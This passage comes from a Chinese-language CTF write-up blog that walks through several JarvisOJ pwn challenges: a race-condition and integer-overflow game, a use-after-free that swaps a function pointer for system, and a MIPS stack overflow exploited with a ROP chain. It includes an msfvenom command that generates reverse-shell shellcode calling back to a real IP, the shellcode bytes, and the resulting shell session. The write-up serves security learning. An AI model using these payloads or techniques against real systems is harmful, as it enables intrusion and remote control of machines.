当做随机数种子，也就是说随机数是可以预测的；再仔细观察，第四关时，怪兽的初始 hp 为 0x7FFFFFFFFFFFFFFE，只要 +2 就会造成整数溢出，满足判断胜负时怪兽 hp &lt; 0 的判断。那么就有了以下的思路：</p> <ol> <li>先利用能预测随机数的特点完美防御怪兽的攻击，直到第四关。</li> <li>选择 <code>fireball</code>，然后 use skill，此时子进程会在设置伤害时 sleep(1)，但主进程还在继续运行，主进程继续 change skill 到 <code>icesword</code>，然后 use skill；这样既可以通过技能伤害不为负的验证，在攻击时又会取 <code>icesword</code> 的伤害导致怪兽的 hp + 1，连续两次造成整数溢出就可以跳到后门函数拿到 flag 了。</li> </ol> <blockquote> <p>本地能稳定跳转到后门函数后，发现远程一直失败。用另一道题目的 shell 查看时间才发现虽然都是 UTC 时间，但相差了大概 25s，修改本地时间后终于拿到了 flag（UTC 时间不同步我还特意问了汪师傅，师傅告诉我确实需要预测时间差）</p> </blockquote> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_hiphop/solve.py">exploit here</a></p> <h2 id="item-board-450">Item Board (450)</h2> <p>这个题目存在如下的结构体</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">ItemStruct</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">description</span><span class="p">;</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">free</span><span class="p">)(</span><span class="n">ItemStruct</span> <span class="o">*</span><span class="p">);</span> <span class="p">};</span> </code></pre></td></tr></table> </div> </div><p>释放结构体后没有把指针清零，存在并且 show 时只检查了下标</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="kr">__cdecl</span> <span class="nf">item_free</span><span class="p">(</span><span class="n">Item</span> <span class="o">*</span><span class="n">item</span><span class="p">)</span> <span class="p">{</span> <span class="n">free</span><span class="p">(</span><span class="n">item</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">item</span><span class="o">-&gt;</span><span class="n">description</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">item</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="kr">__cdecl</span> <span class="nf">show_item</span><span class="p">()</span> <span class="p">{</span> <span class="n">Item</span> <span class="o">*</span><span class="n">item</span><span class="p">;</span> <span class="c1">// ST00_8 </span><span class="c1"></span> <span class="n">Item</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span> <span class="c1">// ST00_8 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">index</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Which item?&#34;</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> <span class="n">index</span> <span class="o">=</span> <span class="n">read_num</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">index</span> <span class="o">&lt;</span> <span class="n">items_cnt</span> <span class="o">&amp;&amp;</span> <span class="n">item_array</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="p">)</span> <span class="p">{</span> <span class="n">item</span> <span class="o">=</span> <span class="n">item_array</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kr">__int8</span><span class="p">)</span><span class="n">index</span><span class="p">];</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Item Detail:&#34;</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Name:%s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">item</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span> <span class="n">item</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Description:%s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v1</span><span class="o">-&gt;</span><span class="n">description</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Hacker!&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>因此可以先通过 unsorted bin 来 leak libc</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_ItemBoard <span class="o">[</span>master●<span class="o">]</span> main_arena ./libc-2.19.so <span class="o">[</span>+<span class="o">]</span>__malloc_hook_offset : 0x3be740 <span class="o">[</span>+<span class="o">]</span>main_arena_offset : 0x3be760 </code></pre></td></tr></table> </div> </div><p>然后通过 uaf 控制结构体里的函数指针，改成 system，那么在下一次 free 时，就相当于调用了 system(chunk)，只需要把 chunk 首部改成 <code>$0; sh; /bin/sh;</code> 等即可。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_ItemBoard/solve.py">exploit here</a></p> <h2 id="png2ascii-450">png2ascii (450)</h2> <p>这是 defconCTF 20 Quals 的一道题目，mips 架构。 程序是静态编译的，可以先用 rizzo 和 sig 恢复部分符号。通过搜索字符串可以定位到关键函数是从 0x401200 开始的。</p> <p>测试后发现在 <code>png2ascii</code> 功能里存在栈溢出，漏洞发生在 read_n_until 时</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.text:</span><span class="err">00401</span><span class="nf">C4C</span> <span class="no">addiu</span> <span class="no">$v0</span><span class="p">,</span> <span class="no">$fp</span><span class="p">,</span> <span class="mi">0x130</span><span class="err">+</span><span class="no">buf</span> <span class="c"># load buffer info $v0 </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C50</span> <span class="no">lw</span> <span class="no">$a0</span><span class="p">,</span> <span class="mi">0x130</span><span class="err">+</span><span class="no">fd</span><span class="p">(</span><span class="no">$fp</span><span class="p">)</span> <span class="c"># load socket descriptor into $a0 </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C54</span> <span class="no">move</span> <span class="no">$a1</span><span class="p">,</span> <span class="no">$v0</span> <span class="c"># load buffer address into $a1 </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C58</span> <span class="no">li</span> <span class="no">$a2</span><span class="p">,</span> <span class="mi">0x200</span> <span class="c"># load max size(0x200) into $a2 </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C5C</span> <span class="no">li</span> <span class="no">$a3</span><span class="p">,</span> <span class="mi">0xA</span> <span class="c"># load delimiter into $a3 </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C60</span> <span class="no">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">read_n_until</span> <span class="nl">.text:</span><span class="err">00401</span><span class="nf">C64</span> <span class="no">nop</span> <span class="nl">.text:</span><span class="err">00401</span><span class="nf">C68</span> <span class="no">jalr</span> <span class="no">$t9</span> <span class="c">; read_n_until # call read_n_until </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C68</span> <span class="c"># </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C68</span> <span class="c"># </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">00401</span><span class="no">C68</span> <span class="c"># stack overflow bug </span></code></pre></td></tr></table> </div> </div><p>可以输入 0x200 个字符，缓冲区却只有 0x108，如果是 x86 直接 rop 即可，但 mips 架构找不到太好的 gadget，最后参考了别人的 writeup 找了这么一段</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.text:</span><span class="err">0040</span><span class="nf">F968</span> <span class="no">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_10</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F96C</span> <span class="no">sw</span> <span class="no">$v0</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_4</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F970</span> <span class="no">lw</span> <span class="no">$a0</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_30</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="c"># file descriptor </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">0040</span><span class="no">F974</span> <span class="no">lw</span> <span class="no">$a1</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_2C</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="c"># destination buffer address </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">0040</span><span class="no">F978</span> <span class="no">lw</span> <span class="no">$a2</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_28</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="c"># read size </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">0040</span><span class="no">F97C</span> <span class="no">li</span> <span class="no">$v0</span><span class="p">,</span> <span class="mi">0xFA3</span> <span class="c"># read syscall </span><span class="c"></span><span class="no">.text</span><span class="p">:</span><span class="mi">0040</span><span class="no">F980</span> <span class="no">syscall</span> <span class="mi">0</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F984</span> <span class="no">sw</span> <span class="no">$v0</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_C</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F988</span> <span class="no">sw</span> <span class="no">$a3</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_8</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F98C</span> <span class="no">lw</span> <span class="no">$a0</span><span class="p">,</span> <span class="mi">0x30</span><span class="err">+</span><span class="no">var_4</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F990</span> <span class="no">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">sub_4115FC</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F994</span> <span class="no">nop</span> <span class="nl">.text:</span><span class="err">0040</span><span class="nf">F998</span> <span class="no">jalr</span> <span class="no">$t9</span> <span class="c">; sub_4115FC </span></code></pre></td></tr></table> </div> </div><p>这样有栈上的变量，看的不是很清楚，我们可以直接在调试的过程中查看这段 gadget</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">pdisass</span> <span class="mi">0x40f968</span> <span class="mi">10</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x40f968</span> <span class="no">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f96c</span> <span class="no">sw</span> <span class="no">$v0</span><span class="p">,</span> <span class="mi">0x2c</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f970</span> <span class="no">lw</span> <span class="no">$a0</span><span class="p">,</span> <span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f974</span> <span class="no">lw</span> <span class="no">$a1</span><span class="p">,</span> <span class="mi">4</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f978</span> <span class="no">lw</span> <span class="no">$a2</span><span class="p">,</span> <span class="mi">8</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f97c</span> <span class="no">addiu</span> <span class="no">$v0</span><span class="p">,</span> <span class="no">$zero</span><span class="p">,</span> <span class="mi">0xfa3</span> <span class="err">0</span><span class="nf">x40f980</span> <span class="no">syscall</span> <span class="mi">0x40f984</span> <span class="no">sw</span> <span class="no">$v0</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f988</span> <span class="no">sw</span> <span class="no">$a3</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f98c</span> <span class="no">lw</span> <span class="no">$a0</span><span class="p">,</span> <span class="mi">0x2c</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f990</span> <span class="no">lw</span> <span class="no">$t9</span><span class="p">,</span> <span class="p">-</span><span class="mi">0x7ccc</span><span class="p">(</span><span class="no">$gp</span><span class="p">)</span> <span class="err">0</span><span class="nf">x40f994</span> <span class="no">nop</span> <span class="mi">0x40f998</span> <span class="no">jalr</span> <span class="no">$t9</span> </code></pre></td></tr></table> </div> </div><p>这样就看的很清楚了，可以控制 read 的三个参数和后边的任意跳转（佩服大佬找 gadget 的深厚功力，如果师傅们有什么好的找 gadget 的方法，请务必指教）</p> <p>可以构造如下的 rop chain</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">+----------+ |0x0040F968| &lt;- ret addr +----------+ |0x4 | &lt;- socket file descriptor ----+ +----------+ | |0x10000000| &lt;- read destination ----+-&gt; read(4, 0x10000000, 0x400) +----------+ | |0x400 | &lt;- read size ----+ +----------+ |junk data | +----------+ |...... | +----------+ |...... | +----------+ |junk data | +----------+ |0x10007ccc| &lt;- set $gp +----------+ </code></pre></td></tr></table> </div> </div><p>此时的 rop 流程如下</p> <ol> <li>返回到 0x40F968，即上边的 gadget 地址</li> <li><code>lw $gp, 0x20($sp)</code> -&gt; gp = sp + 0x20 = 0x10007ccc</li> <li><code>lw $a0, ($sp)</code> -&gt; a0 = sp = 4</li> <li><code>lw $a1, 4($sp)</code> -&gt; a1 = sp + 4 = 0x10000000</li> <li><code>lw $a2, 8($sp)</code> -&gt; a2 = sp + 8 = 0x400</li> <li><code>syscall</code> -&gt; read(4, 0x10000000, 0x400)</li> <li><code>lw $t9, -0x7ccc($gp)</code> -&gt; t9 = 0x100000000</li> <li><code>jalr $t9</code> -&gt; 跳转到 0x10000000</li> </ol> <p>因此，我们只需要把一段 reverse shell 的 shellcode 读到 0x10000000 即可，我用 msf 生成了一段</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@58a35925ee88:/# msfvenom -a mipsle -p linux/mipsle/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>123.207.141.87 <span class="nv">LPORT</span><span class="o">=</span><span class="m">4445</span> -f python <span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::Linux from the payload No encoder or badchars specified, outputting raw payload Payload size: <span class="m">184</span> bytes Final size of python file: <span class="m">896</span> bytes <span class="nv">buf</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xff\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xfd\xff\x0f&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x34\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x11\x5d\x0e\x3c&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x11\x5d\xce\x35\xe4\xff\xae\xaf\x8d\x57\x0e\x3c\x7b&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xcf\xce\x35\xe6\xff\xae\xaf\xe2\xff\xa5\x27\xef\xff&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x01\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x06\x28\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf\xfc&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01&#34;</span> <span class="nv">buf</span> <span class="o">+=</span> <span class="s2">&#34;\x01\x01&#34;</span> <span class="c1"># 腾讯云的学生主机没什么东西，大佬们就不要搞了</span> </code></pre></td></tr></table> </div> </div><p>然后就可以在 vps 上拿到 shell 了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">ubuntu@VM-61-71-ubuntu:~$ nc -lvp <span class="m">4445</span> Listening on <span class="o">[</span>0.0.0.0<span class="o">]</span> <span class="o">(</span>family 0, port 4445<span class="o">)</span> Connection from <span class="o">[</span>209.222.100.138<span class="o">]</span> port <span class="m">4445</span> <span class="o">[</span>tcp/*<span class="o">]</span> accepted <span class="o">(</span>family 2, sport 39056<span class="o">)</span> ls flag pwn100 supervisord.log supervisord.pid id <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_png2ascii/solve.py">exploit here</a></p> <h2 id="61dctfinst-500">[61dctf]inst (500)</h2> <p>这是 Google CTF2017 的一道原题。</p> <p>看一下程序的主要逻辑</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">do_test</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">v0</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kt">char</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// al </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// r12 </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">buf</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-18h] </span><span class="c1"></span> <span class="n">v0</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">alloc_page</span><span class="p">();</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v0</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">template</span><span class="p">;</span> <span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v0</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">template</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span> <span class="n">v1</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)</span><span class="n">template</span> <span class="o">+</span> <span class="mi">14</span><span class="p">);</span> <span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v0</span> <span class="o">+</span> <span class="mi">6</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">template</span> <span class="o">+</span> <span class="mi">6</span><span class="p">);</span> <span class="n">v0</span><span class="p">[</span><span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="n">v1</span><span class="p">;</span> <span class="n">read_inst</span><span class="p">(</span><span class="n">v0</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span> <span class="n">make_page_executable</span><span class="p">(</span><span class="n">v0</span><span class="p">);</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">__rdtsc</span><span class="p">();</span> <span class="p">((</span><span class="kt">void</span> <span class="p">(</span><span class="kr">__fastcall</span> <span class="o">*</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">))</span><span class="n">v0</span><span class="p">)(</span><span class="n">v0</span><span class="p">);</span> <span class="n">buf</span> <span class="o">=</span> <span class="n">__rdtsc</span><span class="p">()</span> <span class="o">-</span> <span class="n">v2</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">8</span> <span class="p">)</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">free_page</span><span class="p">(</span><span class="n">v0</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>每次会申请一段空间，设置可执行权限，然后读 4 个字节到 template 中，最后执行 template，看一下 template</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C00</span> <span class="no">public</span> <span class="no">template</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C00</span> <span class="no">template</span> <span class="no">proc</span> <span class="no">near</span> <span class="c">; DATA XREF: do_test+15↑o </span><span class="c"></span><span class="no">.rodata</span><span class="p">:</span><span class="mi">0000000000000</span><span class="no">C00</span> <span class="no">mov</span> <span class="no">ecx</span><span class="p">,</span> <span class="mi">1000</span><span class="no">h</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C05</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C05</span> <span class="no">loc_C05</span><span class="p">:</span> <span class="c">; CODE XREF: template+C↓j </span><span class="c"></span><span class="no">.rodata</span><span class="p">:</span><span class="mi">0000000000000</span><span class="no">C05</span> <span class="no">nop</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C06</span> <span class="no">nop</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C07</span> <span class="no">nop</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C08</span> <span class="no">nop</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C09</span> <span class="no">sub</span> <span class="no">ecx</span><span class="p">,</span> <span class="mi">1</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C0C</span> <span class="no">jnz</span> <span class="no">short</span> <span class="no">loc_C05</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C0E</span> <span class="no">retn</span> <span class="nl">.rodata:</span><span class="err">0000000000000</span><span class="nf">C0E</span> 